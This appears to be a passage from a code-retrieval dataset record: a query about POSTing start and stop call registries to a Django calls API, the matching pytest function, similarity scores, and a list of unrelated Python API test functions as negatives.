\"T\",\n \"variantType\": \"SNP\",\n \"assemblyId\": \"GRCh38\",\n \"includeDatasetResponses\": \"HIT\",\n }\n async with aiohttp.ClientSession() as session:\n async with session.post(\"http://localhost:5050/query\", data=json.dumps(payload)) as resp:\n data = await resp.json()\n assert data[\"exists\"] is None, sys.exit(\"Query POST Endpoint Error!\")\n assert resp.status == 400, \"HTTP Status code error\"", "def test_get_query_with_api_key(self):\r\n users = UserFactory.create_batch(3)\r\n app = AppFactory.create(owner=users[0], info={'total': 150})\r\n task = TaskFactory.create(app=app, info={'url': 'my url'})\r\n taskrun = TaskRunFactory.create(task=task, user=users[0],\r\n info={'answer': 'annakarenina'})\r\n for endpoint in self.endpoints:\r\n url = '/api/' + endpoint + '?api_key=' + users[1].api_key\r\n res = self.app.get(url)\r\n data = json.loads(res.data)\r\n\r\n if endpoint == 'app':\r\n assert len(data) == 1, data\r\n app = data[0]\r\n assert app['info']['total'] == 150, data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'task':\r\n assert len(data) == 1, data\r\n task = data[0]\r\n assert task['info']['url'] == 'my url', data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'taskrun':\r\n assert len(data) == 1, data\r\n taskrun = data[0]\r\n assert taskrun['info']['answer'] == 'annakarenina', data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'user':\r\n assert len(data) == 3, data\r\n user = data[0]\r\n assert user['name'] == 'user1', data\r\n assert res.mimetype == 'application/json', res", "async def test_report_registration():\n # 
Create a server\n logger = logging.getLogger('openleadr')\n logger.setLevel(logging.DEBUG)\n server = OpenADRServer(vtn_id='testvtn')\n server.add_handler('on_register_report', on_register_report)\n server.add_handler('on_create_party_registration', on_create_party_registration)\n\n # Create a client\n client = OpenADRClient(ven_name='myven', vtn_url='http://localhost:8080/OpenADR2/Simple/2.0b',)\n\n # Add 4 reports\n client.add_report(callback=collect_data,\n report_specifier_id='CurrentReport',\n resource_id='Device001',\n measurement='current',\n unit='A')\n client.add_report(callback=collect_data,\n report_specifier_id='CurrentReport',\n resource_id='Device002',\n measurement='current',\n unit='A')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device001',\n measurement='voltage',\n unit='V')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device002',\n measurement='voltage',\n unit='V')\n\n asyncio.create_task(server.run_async())\n #await asyncio.sleep(1)\n # Register the client\n await client.create_party_registration()\n\n # Register the reports\n await client.register_reports(client.reports)\n assert len(client.report_requests) == 2\n assert len(server.services['report_service'].report_callbacks) == 4\n await client.stop()\n await server.stop()", "def test_start_stop_fn(self, runpath):\n\n driver = self.MyDriver(\n name=\"MyDriver\",\n runpath=runpath,\n pre_start=pre_start_fn,\n post_start=post_start_fn,\n pre_stop=pre_stop_fn,\n post_stop=post_stop_fn,\n )\n\n assert not driver.pre_start_fn_called\n assert not driver.post_start_fn_called\n\n with driver:\n assert driver.pre_start_fn_called\n assert driver.post_start_fn_called\n assert not driver.pre_stop_fn_called\n assert not driver.post_stop_fn_called\n\n assert driver.pre_stop_fn_called\n assert driver.post_stop_fn_called", "def run_single_test(self, config):\n path_name = config['path_name']\n for request in config['request']:\n with self.subTest(request=request, test_name=config['test_name']):\n if 'args' in request:\n url = reverse(path_name, kwargs=request['args'])\n else:\n url = reverse(path_name)\n\n query_params = None\n if 'query_params' in request:\n query_params = urlencode(request['query_params'])\n url = '{}?{}'.format(url, query_params)\n\n data = None\n data_format = 'json'\n if 'data' in request:\n data = request['data']\n\n if 'data_format' in request:\n data_format = request['data_format']\n\n response_check = None\n if 'response_check' in request:\n response_check = request['response_check']\n\n self.call_api(\n url,\n data,\n self.tokens[request['user']],\n request['status'],\n config['type'],\n data_format=data_format,\n response_check=response_check)", "def testEndpoint(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # With no UID given\n status, _ = self._http_get(\"/endpoint\")\n\n # Check result\n self.assertEqual(status, 404)\n\n # Register a service\n svc_reg = context.register_service(\n \"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Request the details of the endpoint\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 200)\n\n # Check the content\n data = json.loads(response)\n for key, 
attr in (('uid', 'uid'), ('sender', 'framework'),\n ('name', 'name')):\n self.assertEqual(data[key], getattr(endpoint, attr))\n\n # Unregister it\n svc_reg.unregister()\n\n # Request the list of endpoints\n status, _ = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 404)", "def test_device_registration(self):\n sensor = self._get_dummy_sensor()\n responses = []\n sensor.set_response_callback(func=lambda response: responses.append(response))\n sensor.register()\n time.sleep(wait_seconds)\n for response in responses:\n print(json.loads(response.content.decode()))\n assert len(responses) > 0\n assert json.loads(responses[0].content.decode())['module_name'] == 'test_get_sensor'\n sensor.stopped.set()" ]
[ "0.8207508", "0.7297929", "0.7013963", "0.6848967", "0.6562138", "0.64560413", "0.6252057", "0.6184207", "0.61758155", "0.6018559", "0.59301925", "0.5880597", "0.5861513", "0.58101547", "0.57913876", "0.57734543", "0.5742188", "0.57399577", "0.57374406", "0.5709208", "0.56703967", "0.5647022", "0.56444365", "0.563619", "0.5635471", "0.5630741", "0.5630347", "0.5620383", "0.5609603", "0.5599015", "0.55885965", "0.5560776", "0.55403227", "0.5531847", "0.5529369", "0.5523128", "0.5514623", "0.54984355", "0.54969287", "0.54775023", "0.5466454", "0.5464824", "0.54565793", "0.5443158", "0.5441289", "0.5437322", "0.54294723", "0.54250413", "0.5424698", "0.542399", "0.54201704", "0.5419394", "0.5414556", "0.5400639", "0.5398801", "0.5393299", "0.5389553", "0.53854257", "0.5376864", "0.5368618", "0.53679377", "0.5363499", "0.5362014", "0.53616774", "0.5349093", "0.53490674", "0.534794", "0.5343957", "0.5334221", "0.53335696", "0.5324502", "0.531889", "0.53186876", "0.53132755", "0.5309383", "0.53063536", "0.5306086", "0.53052026", "0.52994263", "0.52984405", "0.52972215", "0.5286472", "0.52862114", "0.52854055", "0.52770466", "0.52737737", "0.5271821", "0.52613163", "0.525766", "0.5255903", "0.5244013", "0.523769", "0.5235934", "0.5234945", "0.5232811", "0.52170146", "0.52169126", "0.5213415", "0.5210246", "0.5206353" ]
0.85035634
0
Test POSTing a start and a stop registry and expect get it at Call API Endpoint using a call_id. Test uses start_call_fx fixture. Test uses stop_call_fx fixture.
def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client, start_call_fx, stop_call_fx): post_url = reverse_lazy('calls:registry-list') post_data = [start_call_fx, stop_call_fx] for data in post_data: response = client.post(post_url, data, content_type='application/json') assert response.status_code == status.HTTP_201_CREATED get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1}) response = client.get(get_url) assert response.data.get('start_timestamp') assert response.data.get('stop_timestamp')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n start_call_fx_2 = copy(start_call_fx)\n start_call_fx_2['call_id'] = 2\n\n post_data = [start_call_fx, start_call_fx_2, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def testTurbiniaStart(self, mock_create_request):\n mock_create_request.return_value = {\n \"request_id\": \"41483253079448e59685d88f37ab91f7\"\n }\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_create_request\n self.turbinia_processor.requests_api_instance = mock_api_instance\n evidence = {\n \"type\": \"GoogleCloudDisk\",\n \"disk_name\": \"disk-1\",\n \"project\": \"project-1\",\n \"zone\": \"us-central1-f\",\n }\n request_id = self.turbinia_processor.TurbiniaStart(\n evidence=evidence, yara_rules=YARA_RULE)\n 
self.assertEqual(request_id, \"41483253079448e59685d88f37ab91f7\")", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "def test_services_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_service_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service',\n json=expected_response,\n status=200\n )\n resp = requests.get(\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n expected_url = f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service'\n assert responses.calls[0].request.url == expected_url\n assert \"MY-SERVICE-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device\n response = self.client.post(self.incoming_url, call_data)\n\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_start_post(self):\n response = self.client.open('/start',\n method='POST')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device.\n response = self.client.post(self.incoming_url, call_data)\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.android_app,\n )\n call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, 
args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_call(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(content='{\"ok\": true}')\n data = client.call(**self.build_parameters)\n self.assertEqual(data, '{\"ok\": true}')", "def test_run_workflow_by_payload(self):\n full_task_payload = {\n \"workflow_name\" : \"workflow_name\",\n \"input_mappings\" : \"input_mappings\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/run/workflow/',\n method='POST',\n headers=headers,\n data=json.dumps(full_task_payload),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test():\n request = pb2.TestRequest.FromString(flask.request.get_data())\n logger.debug(\"Flask service received: %s\", request)\n\n if not request.service_hops:\n response = pb2.TestResponse(\n id=request.id,\n status=[pb2.CommonResponseStatus(\n status=pb2.SUCCESS,\n )],\n )\n else:\n status = ([pb2.CommonResponseStatus(status=pb2.SUCCESS)] +\n list(service.call_next(request).status))\n response = pb2.TestResponse(id=request.id, status=status)\n\n tracer = execution_context.get_opencensus_tracer()\n tracer.add_attribute_to_current_span(\"reqId\", request.id)\n return response.SerializeToString()", "def test_start_post(self):\n StartConfiguration = StartConfiguration()\n response = self.client.open(\n '/start',\n method='POST',\n data=json.dumps(StartConfiguration),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "async def test_program_start_and_stop(\n aresponses: ResponsesMockServer,\n authenticated_local_client: ResponsesMockServer,\n program_start_stop_response: dict[str, Any],\n) -> None:\n async with authenticated_local_client:\n authenticated_local_client.add(\n f\"{TEST_HOST}:{TEST_PORT}\",\n \"/api/4/program/1/start\",\n \"post\",\n response=aiohttp.web_response.json_response(\n program_start_stop_response, status=200\n ),\n )\n authenticated_local_client.add(\n f\"{TEST_HOST}:{TEST_PORT}\",\n \"/api/4/program/1/stop\",\n \"post\",\n response=aiohttp.web_response.json_response(\n program_start_stop_response, status=200\n ),\n )\n\n async with aiohttp.ClientSession() as session:\n client = Client(session=session)\n await client.load_local(\n TEST_HOST, TEST_PASSWORD, port=TEST_PORT, use_ssl=False\n )\n controller = next(iter(client.controllers.values()))\n\n data = await controller.programs.start(1)\n assert data[\"message\"] == \"OK\"\n\n data = await controller.programs.stop(1)\n assert data[\"message\"] == \"OK\"\n\n aresponses.assert_plan_strictly_followed()", "def test_multiple_segments(self):\n socket = Mock()\n data = service_call.encode_call('bar', [10])\n socket.recv = Mock()\n socket.recv.side_effect = [data[:3], data[3:]]\n\n service_call.handle_connection(self.handlers, socket)\n self.handlers['bar'].assert_any_call([10])", "async def test_service_calls(oppio_env, opp, aioclient_mock):\n 
assert await async_setup_component(opp, \"oppio\", {})\n\n aioclient_mock.post(\"http://127.0.0.1/addons/test/start\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/stop\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/restart\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/update\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/stdin\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/host/shutdown\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/host/reboot\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/snapshots/new/full\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/snapshots/new/partial\", json={\"result\": \"ok\"})\n aioclient_mock.post(\n \"http://127.0.0.1/snapshots/test/restore/full\", json={\"result\": \"ok\"}\n )\n aioclient_mock.post(\n \"http://127.0.0.1/snapshots/test/restore/partial\", json={\"result\": \"ok\"}\n )\n\n await opp.services.async_call(\"oppio\", \"addon_start\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_stop\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_restart\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_update\", {\"addon\": \"test\"})\n await opp.services.async_call(\n \"oppio\", \"addon_stdin\", {\"addon\": \"test\", \"input\": \"test\"}\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 8\n assert aioclient_mock.mock_calls[-1][2] == \"test\"\n\n await opp.services.async_call(\"oppio\", \"host_shutdown\", {})\n await opp.services.async_call(\"oppio\", \"host_reboot\", {})\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 10\n\n await opp.services.async_call(\"oppio\", \"snapshot_full\", {})\n await opp.services.async_call(\n \"oppio\",\n \"snapshot_partial\",\n {\"addons\": [\"test\"], \"folders\": [\"ssl\"], \"password\": \"123456\"},\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 12\n assert aioclient_mock.mock_calls[-1][2] == {\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"password\": \"123456\",\n }\n\n await opp.services.async_call(\"oppio\", \"restore_full\", {\"snapshot\": \"test\"})\n await opp.services.async_call(\n \"oppio\",\n \"restore_partial\",\n {\n \"snapshot\": \"test\",\n \"openpeerpower\": False,\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"password\": \"123456\",\n },\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 14\n assert aioclient_mock.mock_calls[-1][2] == {\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"openpeerpower\": False,\n \"password\": \"123456\",\n }", "async def test_api_call_service_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\n\n Also test if our data came through.\n \"\"\"\n hass.states.async_set(\n \"test.data\",\n \"on\",\n {\"data\": service_call.data[\"test\"]},\n context=service_call.context,\n )\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n resp = await mock_api_client.post(\n \"/api/services/test_domain/test_service\", json={\"test\": 1}\n )\n data = await resp.json()\n assert len(data) == 1\n state = data[0]\n assert state[\"entity_id\"] == \"test.data\"\n assert state[\"state\"] == \"on\"\n 
assert state[\"attributes\"] == {\"data\": 1}", "def testPostEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Register an importer\n importer = ImportListener()\n context.register_service(pelix.remote.SERVICE_IMPORT_ENDPOINT_LISTENER,\n importer,\n {pelix.remote.PROP_REMOTE_CONFIGS_SUPPORTED:\n exporter.configs[0]})\n\n # Register a service\n context.register_service(\"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Get its representation\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n self.assertEqual(status, 200)\n\n # Change its UID and framework UID\n endpoint_data = json.loads(response)\n endpoint_data['uid'] = 'other-uid'\n endpoint_data['name'] = 'other-name'\n endpoint_data['sender'] = 'other-framework'\n\n # Send the 'discovered' event\n status, response = self._http_post(\"endpoints\",\n json.dumps([endpoint_data]))\n self.assertEqual(status, 200)\n self.assertEqual(response, 'OK')\n\n # Ensure that the service has been registered\n imported_endpoint = importer.endpoints[endpoint_data['uid']]\n self.assertEqual(imported_endpoint.uid, endpoint_data['uid'])\n self.assertEqual(imported_endpoint.framework, endpoint_data['sender'])\n self.assertEqual(imported_endpoint.name, endpoint_data['name'])", "def test_call(self):\n with HTTMock(spark_cloud_mock):\n for f in self.device.functions:\n expected = self.cloud_device.call(f, 'args')\n self.assertEqual(self.device.call(f, 'args'), expected)", "async def test_api_call_service_no_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\"\"\"\n test_value.append(1)\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n await mock_api_client.post(\"/api/services/test_domain/test_service\")\n await hass.async_block_till_done()\n assert len(test_value) == 1", "def test_gwservice_updatedevice(self, setup_controller):\n configuration = {'uuid': '1'}\n payload = {'serialNumber': 'DEADBEEF0011',\n 'UUID': '123456',\n 'configuration': configuration,\n 'deviceType': 'AP',\n 'location': '',\n 'macAddress': 'DE:AD:BE:EF:00:11',\n 'manufacturer': 'Testing',\n 'owner': ''}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"POST\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create devices\", body=body)\n if resp.status_code != 200:\n assert False\n devices = json.loads(resp.text)\n print (devices)\n\n payload = {'serialNumber': 'DEADBEEF0011',\n 'owner': 'pytest'}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"PUT\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"GET\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create device verify\", body=body)\n if resp.status_code != 200:\n assert False\n\n device = json.loads(resp.text)\n print (device)\n\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"DELETE\", None, None)\n 
body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False\n\n @pytest.mark.sdk_restapi\n def test_gwservice_deletedevice(self, setup_controller):\n \"\"\"\n Test the delete device endpoint\n WIFI-3455\n \"\"\"\n configuration = {'uuid': '1'}\n payload = {'serialNumber': 'DEADBEEF0011',\n 'UUID': '123456',\n 'configuration': configuration,\n 'deviceType': 'AP',\n 'location': '',\n 'macAddress': 'DE:AD:BE:EF:00:11',\n 'manufacturer': 'Testing',\n 'owner': ''}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"POST\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create devices\", body=body)\n if resp.status_code != 200:\n assert False\n devices = json.loads(resp.text)\n print (devices)\n\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"DELETE\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False", "def test_rpcCall(self):\n pass", "async def test_create_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_get_dispatch_route_history(client):\n params = [('access_token', 'access_token_example'),\n ('start_time', 56),\n ('end_time', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/dispatch/routes/{route_id}/history'.format(route_id=56),\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_API(self):\n print(\"Test API ...\")\n t0 = time.time()\n c = 0\n for trip_headsign in TRIP_HEADSIGN:\n for stop in STOP_A:\n payload = {'format': 'json', 'route_id': \"A\", 'trip_headsign': trip_headsign, 'stop_name': stop}\n req = requests.get('https://applications002.brest-metropole.fr/WIPOD01/Transport/REST/getRemainingTimes',params=payload)\n if len(req.text) < 100 : #API answer 189 characters if it works well\n print(\"API not responding for parameters : {}, {} \".format(trip_headsign, stop))\n c += 1\n else :\n print(\"Params : {}, {} : {}\".format(trip_headsign, stop, req.text))\n duration = time.time() - t0\n print(\"END OF TEST : duration : {} s, {} requests failed\".format(duration, c))", "def test_restart_process(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_process(0, 'appli:*', 'arg list', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n 
self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', 'arg list','wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_process(0, 'appli:*', '', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', '', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "def test_start_several_values(self):\n for ip in [\"1.1.1.1\", \"2.2.2.2\", \"3.3.3.3\"]:\n self.client.ensure_path(\"/services/db/%s\" % ip)\n self.client.set(\"/services/db/%s\" % ip,\n json.dumps({\"enabled\": \"1\",\n \"ip\": ip}))\n z = ZkFarmExporter(self.client, \"/services/db\", self.conf)\n z.loop(2, timeout=self.TIMEOUT)\n self.conf.write.assert_called_with({\"1.1.1.1\": {\"enabled\": \"1\", \"ip\": \"1.1.1.1\"},\n \"2.2.2.2\": {\"enabled\": \"1\", \"ip\": \"2.2.2.2\"},\n \"3.3.3.3\": {\"enabled\": \"1\", \"ip\": \"3.3.3.3\"}})", "def test_service_call(self, create_connection):\n create_connection.return_value = Mock()\n create_connection.return_value.recv = Mock(return_value=msgpack.packb(None))\n\n adress = ('127.0.0.1', 20001)\n method_name = 'foo'\n method_params = [12]\n\n expected_data = service_call.encode_call(method_name, method_params)\n\n service_call.call(adress, method_name, method_params)\n\n create_connection.assert_any_call(adress)\n create_connection.return_value.sendall.assert_any_call(expected_data)", "def test_get_run(self):\n pass", "def test_tick(requests_mock, test_operator):\n tick_url = (\"https://habitica.com/api/v3/tasks/{}/score/up\"\n \"\".format(\"963e2ced-fa22-4b18-a22b-c423764e26f3\"))\n test_operator.tick_task(\"Test habit\")\n\n assert len(requests_mock.request_history) == 2\n tick_request = requests_mock.request_history[1]\n assert tick_url in tick_request.url", "def test_get_next_to_arrive(self, mock_requests):\n\n 
